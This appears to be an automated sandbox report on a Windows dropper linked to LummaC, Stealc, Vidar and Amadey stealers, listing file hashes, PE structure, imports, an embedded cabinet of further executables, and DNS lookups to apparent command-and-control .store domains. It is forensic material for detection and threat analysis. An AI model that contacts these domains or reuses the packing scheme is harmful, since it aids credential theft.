	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	p5iu2ILQzE.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	build.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	QS4CbvR1WQ.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	p5iu2ILQzE.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	build.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\2h6379.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46020
Entropy (8bit):	6.087585077633844
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQgx9MBLuwhDO6vP6OJa5KpRSDJpkXFfDuhy1DhSCAoWGoup1Xl0:mMk1rT8HR9Mo6pN+01sRoWhu3VlXr4x
MD5:	2CE2F83FE90C5C090ABFB5928BAC4523
SHA1:	439DC04CDB77EE53AA400167D9BEA60F68B4F3B7
SHA-256:	8A31E3A8A9D407D0E6AA6D59F7F20C8EBE53914D4DD5312E853C64D445E0C9CB
SHA-512:	645941AF1E34AA1BAE890134CA97D0E0F0273C3D19E376BA07E6EC52553A48B5263652814E8C3FB1DAB9E47EC055471DEA067F018431737183A149C101F14B46
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

Process:	C:\Users\user\Desktop\ByVoN4bhSU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3245056
Entropy (8bit):	6.650560024555319
Encrypted:	false
SSDEEP:	49152:DNK2tJryjBRc3ly9HOPtPRDkeqipcoM1UM:U2tJoBe3kHKCeqP7
MD5:	2F2A8968BCDC26DC26F35A7F0E741B94
SHA1:	8FF2C4C2BAC54FC34C12EE6E8B2349141AE1703C
SHA-256:	B4ED53947A407459822C5D352BB5300A5885B9DEC2B6C319C48F54B57A02E2EB
SHA-512:	6288B580F9DA2760F2B30565CFA6B5C57C2E9C776E3F04AD7AC1F5C5630678AEA869F5F0D494AA244E2DBEB17615936FB29F68A20B0F23325238A5C417568EF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....Hc2...@.................................W...k...........................,x1..............................w1..................................................... . ............................@....rsrc...............................@....idata ............................@...paflvhti..........................@...ykjvsrqi......1......^1.............@....taggant.0....1.."...b1.............@...........................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\j1C74.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3003904
Entropy (8bit):	6.5403381283860105
Encrypted:	false
SSDEEP:	49152:D8hB3IQYpTw0Tpl50NDTbB44afUSxsHG+RH6P:wr3IXpTw0q1B44aRaX2
MD5:	781C92234AD3FA7FAFDA08C434D9A50E
SHA1:	EAE985CEABB46B58A7460C29620288535E7BB5CE
SHA-256:	74495C23AE1C2767BC43B39A3F4CEA3A6414280DBCF9610D66B4FAEAF31B6724
SHA-512:	B6DBD83E54F87E3223312A36D7276DFD2A09AE0689A48BA689D5C99B37D222A2BA8C534B89176227CE1B6D1CCEC8D7D9C50FAE78065D8C3AF312AEE8DC05AA6E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1......z....@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...atmfzxnt. +.......+.................@...cfwltgdw......0.......-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 08:13:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.968211509890627
Encrypted:	false
SSDEEP:	48:83dqTWqeH/idAKZdA19ehwiZUklqeh3y+3:8gbe8y
MD5:	F4CF19221AE376EE19C5043B317832DC
SHA1:	A8C7600DC282FC194DC43516AD9A9D4D0FBE6909
SHA-256:	B125AE8167DA587535DF98E64815D5771D220687269B7B98A7D6D19C9C4E6D77
SHA-512:	CC0E56254B14E9DF3D42ADBDD04F6A245835E5FB7E825D9A7A222295535401174672866A2B6D0E8A1AC88A8C0C720F3570C3AD11B7584AE5EAE1D63A27A3A94E
Malicious:	false
Preview:	L..................F.@.. ...$+.,....n.,.b/..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeY.I....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY.I....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeY.I....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeY.I..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeY.I...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$.ml.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x580ba8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x58d000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	b0b66b32f4ca82e2e157c51b24da0be7	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	7b9890a93c0516bb070e1170cfde54d5	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	67ce48bf2e7c8fe3321ca7aa188f77e2	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x581000	0x580c00	ad4bd68e62d50195ebf5da1e119801e1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x58d000	0x888	0xa00	6025c825c4098ef081ac8ee3c8d5dd22	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x24740	0x2f2	data	English	United States	0.4389920424403183
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia	0.44534883720930235
RT_DIALOG	0x24d90	0x1b0	data	English	United States	0.5625
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia	0.573394495412844
RT_DIALOG	0x250f4	0x166	data	English	United States	0.5223463687150838
RT_DIALOG	0x2525c	0x168	data	Russian	Russia	0.5361111111111111
RT_DIALOG	0x253c4	0x1c0	data	English	United States	0.5446428571428571
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia	0.55
RT_DIALOG	0x25764	0x130	data	English	United States	0.5526315789473685
RT_DIALOG	0x25894	0x150	data	Russian	Russia	0.5416666666666666
RT_DIALOG	0x259e4	0x120	data	English	United States	0.5763888888888888
RT_DIALOG	0x25b04	0x122	data	Russian	Russia	0.5793103448275863
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States	0.6214285714285714
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia	0.7164179104477612
RT_STRING	0x25d3c	0x520	data	English	United States	0.4032012195121951
RT_STRING	0x2625c	0x52e	data	Russian	Russia	0.39441930618401205
RT_STRING	0x2678c	0x5cc	data	English	United States	0.36455525606469
RT_STRING	0x26d58	0x592	data	Russian	Russia	0.4011220196353436
RT_STRING	0x272ec	0x4b0	data	English	United States	0.385
RT_STRING	0x2779c	0x4b2	data	Russian	Russia	0.3910149750415973
RT_STRING	0x27c50	0x44a	data	English	United States	0.3970856102003643
RT_STRING	0x2809c	0x43e	data	Russian	Russia	0.4567219152854512
RT_STRING	0x284dc	0x3ce	data	English	United States	0.36858316221765913
RT_STRING	0x288ac	0x2fc	data	Russian	Russia	0.4424083769633508
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x28bb0	0x562ec9	Microsoft Cabinet archive data, many, 5648073 bytes, 2 files, at 0x2c +A "j1C74.exe" +A "4w017y.exe", ID 1509, number 1, 220 datablocks, 0x1503 compression	Russian	Russia	1.0000152587890625
RT_RCDATA	0x58ba7c	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x58ba80	0x24	data	Russian	Russia	0.9444444444444444
RT_RCDATA	0x58baa4	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x58baac	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x58bab4	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x58bab8	0xb	ASCII text, with no line terminators	English	United States	1.7272727272727273
RT_RCDATA	0x58bac4	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x58bac8	0xa	data	English	United States	1.8
RT_RCDATA	0x58bad4	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x58bad8	0x6	data	Russian	Russia	2.3333333333333335
RT_RCDATA	0x58bae0	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x58bae8	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_GROUP_ICON	0x58baf0	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x58bbac	0x408	data	English	United States	0.42441860465116277
RT_VERSION	0x58bfb4	0x410	data	Russian	Russia	0.46826923076923077
RT_MANIFEST	0x58c3c4	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3761149653121903

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 10:12:57.869616985 CET	192.168.2.5	1.1.1.1	0xd97b	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.353369951 CET	192.168.2.5	1.1.1.1	0x9276	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.391747952 CET	192.168.2.5	1.1.1.1	0x7e37	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.417917967 CET	192.168.2.5	1.1.1.1	0x8c34	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.463921070 CET	192.168.2.5	1.1.1.1	0x7032	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.488914967 CET	192.168.2.5	1.1.1.1	0x4795	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:28.888355017 CET	192.168.2.5	1.1.1.1	0x673c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:28.888551950 CET	192.168.2.5	1.1.1.1	0x4292	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:34.606484890 CET	192.168.2.5	1.1.1.1	0xfb86	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:34.606648922 CET	192.168.2.5	1.1.1.1	0x3b6e	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:35.641604900 CET	192.168.2.5	1.1.1.1	0x79fe	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:35.641972065 CET	192.168.2.5	1.1.1.1	0x338c	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:41.964565039 CET	192.168.2.5	1.1.1.1	0xad14	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:41.964864016 CET	192.168.2.5	1.1.1.1	0x2852	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:43.326992989 CET	192.168.2.5	1.1.1.1	0xd871	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:43.327146053 CET	192.168.2.5	1.1.1.1	0x7bee	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 5, 2024 10:13:45.145684004 CET	192.168.2.5	1.1.1.1	0xa946	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.146869898 CET	192.168.2.5	1.1.1.1	0x15de	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:45.148412943 CET	192.168.2.5	1.1.1.1	0x1a43	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.148556948 CET	192.168.2.5	1.1.1.1	0x72c0	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:45.184576035 CET	192.168.2.5	1.1.1.1	0x3dbd	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.184669971 CET	192.168.2.5	1.1.1.1	0xb624	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:45.197052002 CET	192.168.2.5	1.1.1.1	0x2299	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.197216988 CET	192.168.2.5	1.1.1.1	0x5920	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:45.395216942 CET	192.168.2.5	1.1.1.1	0x61f	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:45.395379066 CET	192.168.2.5	1.1.1.1	0xdad2	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:46.683636904 CET	192.168.2.5	1.1.1.1	0xbb03	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.683782101 CET	192.168.2.5	1.1.1.1	0xc2aa	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:46.684253931 CET	192.168.2.5	1.1.1.1	0xf86f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.684458017 CET	192.168.2.5	1.1.1.1	0x60cd	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 10:13:46.693660975 CET	192.168.2.5	1.1.1.1	0xb7ac	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:46.693890095 CET	192.168.2.5	1.1.1.1	0xec37	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 10:12:58.271867037 CET	1.1.1.1	192.168.2.5	0xd97b	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.375822067 CET	1.1.1.1	192.168.2.5	0x9276	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.415319920 CET	1.1.1.1	192.168.2.5	0x7e37	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.443947077 CET	1.1.1.1	192.168.2.5	0x8c34	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.487759113 CET	1.1.1.1	192.168.2.5	0x7032	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.514074087 CET	1.1.1.1	192.168.2.5	0x4795	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:12:58.514074087 CET	1.1.1.1	192.168.2.5	0x4795	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:28.895340919 CET	1.1.1.1	192.168.2.5	0x673c	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:28.895879984 CET	1.1.1.1	192.168.2.5	0x4292	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 5, 2024 10:13:34.613332987 CET	1.1.1.1	192.168.2.5	0x3b6e	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:34.614191055 CET	1.1.1.1	192.168.2.5	0xfb86	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:34.614191055 CET	1.1.1.1	192.168.2.5	0xfb86	No error (0)	plus.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:35.648519039 CET	1.1.1.1	192.168.2.5	0x79fe	No error (0)	play.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:41.971438885 CET	1.1.1.1	192.168.2.5	0xad14	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:41.972295046 CET	1.1.1.1	192.168.2.5	0x2852	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:42.312969923 CET	1.1.1.1	192.168.2.5	0x41d2	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:42.327951908 CET	1.1.1.1	192.168.2.5	0x9587	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 10:13:42.327951908 CET	1.1.1.1	192.168.2.5	0x9587	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 5, 2024 10:13:43.333995104 CET	1.1.1.1	192.168.2.5	0x7bee	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
